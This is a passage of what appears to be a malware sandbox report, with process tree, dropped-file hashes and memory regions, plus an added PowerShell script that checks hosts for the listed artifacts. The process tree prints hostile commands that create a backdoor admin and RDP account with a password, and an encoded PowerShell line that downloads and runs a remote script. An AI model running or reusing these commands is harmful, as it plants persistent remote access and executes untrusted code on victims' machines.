      Command line: net.exe user WgaUtilAcc rbAwK2ZR /add
      - Suspicious use of WriteProcessMemory

    [3] C:\Windows\system32\net1.exe
        Command line: C:\Windows\system32\net1 user WgaUtilAcc rbAwK2ZR /add

[1] C:\Windows\System32\cmd.exe
    Command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    - Suspicious use of WriteProcessMemory

  [2] C:\Windows\system32\net.exe
      Command line: net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

    [3] C:\Windows\system32\net1.exe
        Command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

[1] C:\Windows\System32\cmd.exe
    Command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" GAWKBMOT$ /ADD

  [2] C:\Windows\system32\net.exe
      Command line: net.exe LOCALGROUP "Remote Desktop Users" GAWKBMOT$ /ADD

    [3] C:\Windows\system32\net1.exe
        Command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GAWKBMOT$ /ADD

[1] C:\Windows\System32\cmd.exe
    Command line: cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD

  [2] C:\Windows\system32\net.exe
      Command line: net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD

    [3] C:\Windows\system32\net1.exe
        Command line: C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD

[1] C:\Windows\System32\cmd.exe
    Command line: cmd /C net.exe user WgaUtilAcc rbAwK2ZR

  [2] C:\Windows\system32\net.exe
      Command line: net.exe user WgaUtilAcc rbAwK2ZR

    [3] C:\Windows\system32\net1.exe
        Command line: C:\Windows\system32\net1 user WgaUtilAcc rbAwK2ZR

[1] C:\Windows\System32\cmd.exe
    Command line: cmd.exe /C wmic path win32_VideoController get name

  [2] C:\Windows\System32\Wbem\WMIC.exe
      Command line: wmic path win32_VideoController get name
      - Detects videocard installed
      - Suspicious use of AdjustPrivilegeToken

[1] C:\Windows\System32\cmd.exe
    Command line: cmd.exe /C wmic CPU get NAME

  [2] C:\Windows\System32\Wbem\WMIC.exe
      Command line: wmic CPU get NAME
      - Suspicious use of AdjustPrivilegeToken

[1] C:\Windows\System32\cmd.exe
    Command line: cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

  [2] C:\Windows\system32\cmd.exe
      Command line: cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
        - Blocklisted process makes network request
        - Drops file in Program Files directory
        - Drops file in Windows directory
        - Modifies data under HKEY_USERS
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
-
C:\Users\Admin\AppData\Local\Temp\RES515C.tmpFilesize
1KB
MD51bf7c0ed04019c95717886f35d52b97b
SHA1ba667d491164ceb066403a6213f565134fbea0b3
SHA25666e87caf52b0fdfd1f971cfc5450a48f164999b0ca7c4c94db6172c2dac384e0
SHA5126196932ac6c3ced55dd3d8a6cad5c63e9cf9fefc62787f5dc51adbc49a213d405df9d989901fa10b8cf336ba1ede1d20e1002f3b44ef4fefdd19cf579bc4d6d9
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xnwclm05.tuq.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1Filesize
2.5MB
MD5a9176019ae2f0af22af200ca4f842b59
SHA122c13657a4210aca116ab63d2f806906dda954fd
SHA256af452873200eda5950c1dedbfed833da08b697cea98402cd16478df89d770739
SHA5125171e192c05a60aca06c5b4e12b69744f870a64d8c69289205f7aa082dbe1913cadd7fe4ab8d16f2d2d5eab0ebb687c68d5448b8a821c5912ec9670572d6ad3b
-
C:\Users\Admin\AppData\Local\Temp\nvb2al1r\nvb2al1r.dllFilesize
3KB
MD584a20143200a35e6cf9a70fb0a80e81a
SHA1b5e76a5afedea22dc718383ee846f8d2cf025313
SHA256d5ecb6c8a2cdbf275d822b3c062c3d124d2305d2c93d6d51f05aec98eac3528f
SHA512a4206db7fa470924664f18432fcf51e5916425546aa4a3ea1d4451232c2c23c395dd13f0e730f75a6da755dcf49ae5666836a955f3b72b3e155617044d0df515
-
C:\Users\Admin\AppData\Local\Temp\ready.ps1Filesize
1KB
MD528d9755addec05c0b24cca50dfe3a92b
SHA17d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42
-
C:\Windows\Branding\mediasrv.pngFilesize
60KB
MD59453615d542c9b0d521b429b9794e07d
SHA16c543926f7fcb171970bcca59a4fff36873a50a3
SHA256b59ab823d4ce1e90b39ac043ded78549b60c62b296c85b7c423d3494af220c34
SHA512b6816d54bc1790107293f304d3252d84ecb92c6d2fd4b017537329be1fada98322766109c1306d71540cda3ef7936e3f2c0eabd894a9f2fc56183b1add292c34
-
C:\Windows\Branding\mediasvc.png
Filesize 743KB
MD5 1b1412c2f9d041ad20da79f2d5a3b130
SHA1 8ac8f1a8c75daf1f150f6bb103c1ccc510067758
SHA256 126438fadef33a97efa43b1339c5cb6e2b45dd81329381968da74909cc1aaa1f
SHA512 3dbcc808c88d8098887f7a69e182d25c17aef23f3f1e7d5fc290792bb99be5a35f62169055fddf42a7082800ddd069ddfb3f2f2742d8687bab30065dc7fb74bc
-
C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI7F13.tmp
Filesize 24KB
MD5 d0e162c0bd0629323ebb1ed88df890d6
SHA1 cf3fd2652cdb6ff86d1df215977454390ed4d7bc
SHA256 3e6520cd56070637daa5c3d596e57e6b5e3bd1a25a08804ccea1ce4f50358744
SHA512 a9c82f1116fce7052d1c45984e87b8f3b9f9afeb16be558fd1ecbd54327350344f37f32bc5d4baabd3e1cf3ac0de75c8ba569c1e34aaf1094cd04641d137c117
-
C:\Windows\system32\rfxvmt.dll
Filesize 40KB
MD5 dc39d23e4c0e681fad7a3e1342a2843c
SHA1 58fd7d50c2dca464a128f5e0435d6f0515e62073
SHA256 6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA512 5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7
-
\??\PIPE\lsarpc
(hashes below are those of zero-length input: the pipe contributed no bytes, so they are not usable as an indicator)
MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\c:\Users\Admin\AppData\Local\Temp\nvb2al1r\CSC3B066624B2AE420C8E6B3E287BE0BE1.TMP
Filesize 652B
MD5 07a689eba7b80148f9ebba5fe514f4ad
SHA1 d0fcf197578516471304b0f26f89bd8456d4a6ac
SHA256 90e72e5e0eed8c91c768268349dad7ea3ac644e1af8b0f0ef3c705927017e79c
SHA512 71da0d39e3c4cb45b7df2318343bfb39e6a3075f4e8bbdb30ee983a7d0e936ff83dc37ba70844218470d51f4dc81eeee2addfc8031108da5bb5ec381b4072c0b
-
\??\c:\Users\Admin\AppData\Local\Temp\nvb2al1r\nvb2al1r.0.cs
Filesize 424B
MD5 9f8ab7eb0ab21443a2fe06dab341510e
SHA1 2b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256 e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA512 53f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b
-
\??\c:\Users\Admin\AppData\Local\Temp\nvb2al1r\nvb2al1r.cmdline
Filesize 369B
MD5 b0f31b4da2441de66423fb6f99c55e5c
SHA1 c4fdeb713ce1e6ccfdb88aea4d6c507106acc40b
SHA256 01952217ce50ed5fda8dc599dbfb5a932d6d8a2129b4590b4c124cdbbcfde03c
SHA512 a178d79d7a6d98341f5f6f4aa9cd9f46a38952c71406c27a8c335994735741efa640bb2f7ee88e001b0280820448b2ed28ac96bf2f601d16ee444117c42036de
-
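The dropped-file paths and SHA256 values listed above are what a responder takes to other hosts. The PowerShell hunt script below is an added example, not part of the sandbox output: it checks the three files written under C:\Windows (mediasrv.png, mediasvc.png, rfxvmt.dll) against the SHA256 values from the list, goes beyond the single sandbox profile by checking every profile under C:\Users for the two scripts seen in the user's Temp (ready.ps1, get-dnsprovider.PS1), and reads the TermService ServiceDll value, flagging it if it is anything other than the stock %SystemRoot%\System32\termsrv.dll. Assumptions of the example: the key is read under CurrentControlSet, and termsrv.dll is the expected default. A file that is present with a different hash is reported as such rather than called malicious, since a file of the same name can be legitimate; a hash MATCH or an UNEXPECTED ServiceDll is the finding.

```powershell
# Added hunt script for the artifacts listed in this report; not part of the sandbox output.
# Run from an elevated PowerShell on a suspect host.
# Assumptions: SHA256 values are the ones in the dropped-files list above; the stock
# TermService ServiceDll is %SystemRoot%\System32\termsrv.dll; the key is read under CurrentControlSet.

$systemIocs = @(
    @{ Path = 'C:\Windows\Branding\mediasrv.png'; Sha256 = 'b59ab823d4ce1e90b39ac043ded78549b60c62b296c85b7c423d3494af220c34' }
    @{ Path = 'C:\Windows\Branding\mediasvc.png'; Sha256 = '126438fadef33a97efa43b1339c5cb6e2b45dd81329381968da74909cc1aaa1f' }
    @{ Path = 'C:\Windows\System32\rfxvmt.dll';    Sha256 = '6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9' }
)

# Scripts the sandbox saw in the analysis user's Temp; checked in every profile under C:\Users.
$profileIocs = @(
    @{ Rel = 'AppData\Local\Temp\ready.ps1';           Sha256 = 'abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9' }
    @{ Rel = 'AppData\Local\Temp\get-dnsprovider.PS1'; Sha256 = 'af452873200eda5950c1dedbfed833da08b697cea98402cd16478df89d770739' }
)

function Test-Artifact {
    param([string]$Path, [string]$Sha256)
    # absent / MATCH / present-but-different; only MATCH is treated as a confirmed indicator.
    if (-not (Test-Path -LiteralPath $Path -PathType Leaf)) {
        return [pscustomobject]@{ Path = $Path; Status = 'absent'; Sha256 = $null }
    }
    $actual = (Get-FileHash -LiteralPath $Path -Algorithm SHA256).Hash.ToLowerInvariant()
    $status = if ($actual -eq $Sha256.ToLowerInvariant()) { 'MATCH' } else { 'present, hash differs' }
    [pscustomobject]@{ Path = $Path; Status = $status; Sha256 = $actual }
}

function Test-TermServiceDll {
    # TermService should load termsrv.dll from System32; any other ServiceDll is a persistence finding.
    $termKey     = 'HKLM:\SYSTEM\CurrentControlSet\Services\TermService\Parameters'
    $serviceDll  = (Get-ItemProperty -Path $termKey -Name ServiceDll -ErrorAction SilentlyContinue).ServiceDll
    $expectedDll = Join-Path $env:SystemRoot 'System32\termsrv.dll'
    $status = 'UNEXPECTED'
    if (-not $serviceDll) { $status = 'value missing' }
    elseif ([Environment]::ExpandEnvironmentVariables($serviceDll) -ieq $expectedDll) { $status = 'expected' }
    [pscustomobject]@{ Path = "$termKey\ServiceDll = $serviceDll"; Status = $status; Sha256 = $null }
}

$results = @()
foreach ($ioc in $systemIocs) {
    $results += Test-Artifact -Path $ioc.Path -Sha256 $ioc.Sha256
}
foreach ($profile in Get-ChildItem -Path 'C:\Users' -Directory -ErrorAction SilentlyContinue) {
    foreach ($ioc in $profileIocs) {
        $results += Test-Artifact -Path (Join-Path $profile.FullName $ioc.Rel) -Sha256 $ioc.Sha256
    }
}
$results += Test-TermServiceDll

$results | Format-Table -AutoSize
# Non-zero exit so the script can be fanned out (e.g. via Invoke-Command) and hits collected by exit code.
if ($results | Where-Object { $_.Status -in 'MATCH', 'UNEXPECTED' }) { exit 1 } else { exit 0 }
```

The user-profile sweep uses the same relative path the sandbox recorded, so it will miss copies dropped elsewhere; the ServiceDll check is the one that survives a renamed payload, because the service still has to be pointed at the file.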
memory/2044-5-0x0000023676810000-0x0000023676820000-memory.dmp
Filesize 64KB
-
memory/2044-1-0x00007FFE27BA0000-0x00007FFE28661000-memory.dmp
Filesize 10.8MB
-
memory/2044-0-0x0000023676C30000-0x0000023677034000-memory.dmp
Filesize 4.0MB
-
memory/2044-2-0x0000023676810000-0x0000023676820000-memory.dmp
Filesize 64KB
-
memory/2044-3-0x0000023676810000-0x0000023676820000-memory.dmp
Filesize 64KB
-
memory/2044-155-0x00007FFE27BA0000-0x00007FFE28661000-memory.dmp
Filesize 10.8MB
-
memory/2044-4-0x0000023676810000-0x0000023676820000-memory.dmp
Filesize 64KB
-
memory/2044-79-0x0000023676810000-0x0000023676820000-memory.dmp
Filesize 64KB
-
memory/2044-67-0x0000023676810000-0x0000023676820000-memory.dmp
Filesize 64KB
-
memory/2044-66-0x0000023676810000-0x0000023676820000-memory.dmp
Filesize 64KB
-
memory/2044-65-0x0000023676810000-0x0000023676820000-memory.dmp
Filesize 64KB
-
memory/2044-54-0x00007FFE27BA0000-0x00007FFE28661000-memory.dmp
Filesize 10.8MB
-
memory/2104-38-0x00000281F7D40000-0x00000281F7EB6000-memory.dmp
Filesize 1.5MB
-
memory/2104-34-0x00000281DF400000-0x00000281DF408000-memory.dmp
Filesize 32KB
-
memory/2104-17-0x00007FFE27BA0000-0x00007FFE28661000-memory.dmp
Filesize 10.8MB
-
memory/2104-153-0x00007FFE27BA0000-0x00007FFE28661000-memory.dmp
Filesize 10.8MB
-
memory/2104-18-0x00000281DF420000-0x00000281DF442000-memory.dmp
Filesize 136KB
-
memory/2104-100-0x00000281F7750000-0x00000281F7760000-memory.dmp
Filesize 64KB
-
memory/2104-39-0x00000281F80D0000-0x00000281F82DA000-memory.dmp
Filesize 2.0MB
-
memory/2104-152-0x00007FFE328A0000-0x00007FFE328B9000-memory.dmp
Filesize 100KB
-
memory/2104-144-0x00000281F7750000-0x00000281F7760000-memory.dmp
Filesize 64KB
-
memory/2104-113-0x00000281F7750000-0x00000281F7760000-memory.dmp
Filesize 64KB
-
memory/2104-80-0x00007FFE328A0000-0x00007FFE328B9000-memory.dmp
Filesize 100KB
-
memory/2104-37-0x00000281F7750000-0x00000281F7760000-memory.dmp
Filesize 64KB
-
memory/2104-19-0x00000281F7750000-0x00000281F7760000-memory.dmp
Filesize 64KB
-
memory/2104-20-0x00000281F7750000-0x00000281F7760000-memory.dmp
Filesize 64KB
-
memory/2104-98-0x00007FFE27BA0000-0x00007FFE28661000-memory.dmp
Filesize 10.8MB
-
memory/3168-52-0x00007FFE27BA0000-0x00007FFE28661000-memory.dmp
Filesize 10.8MB
-
memory/3168-40-0x00007FFE27BA0000-0x00007FFE28661000-memory.dmp
Filesize 10.8MB
-
memory/3168-41-0x000001DDC3FB0000-0x000001DDC3FC0000-memory.dmp
Filesize 64KB
-
memory/3168-42-0x000001DDC3FB0000-0x000001DDC3FC0000-memory.dmp
Filesize 64KB
-
memory/3920-110-0x00007FFE27BA0000-0x00007FFE28661000-memory.dmp
Filesize 10.8MB
-
memory/3920-112-0x000002A1D58B0000-0x000002A1D58C0000-memory.dmp
Filesize 64KB
-
memory/3920-111-0x000002A1D58B0000-0x000002A1D58C0000-memory.dmp
Filesize 64KB
-
memory/3920-145-0x000002A1D58B0000-0x000002A1D58C0000-memory.dmp
Filesize 64KB
-
memory/3920-148-0x00007FFE27BA0000-0x00007FFE28661000-memory.dmp
Filesize 10.8MB
-
memory/4580-78-0x00007FFE27BA0000-0x00007FFE28661000-memory.dmp
Filesize 10.8MB
-
memory/4580-77-0x00007FFE27BA0000-0x00007FFE28661000-memory.dmp
Filesize 10.8MB
-
memory/4932-64-0x00007FFE27BA0000-0x00007FFE28661000-memory.dmp
Filesize 10.8MB
-
memory/4932-53-0x00007FFE27BA0000-0x00007FFE28661000-memory.dmp
Filesize 10.8MB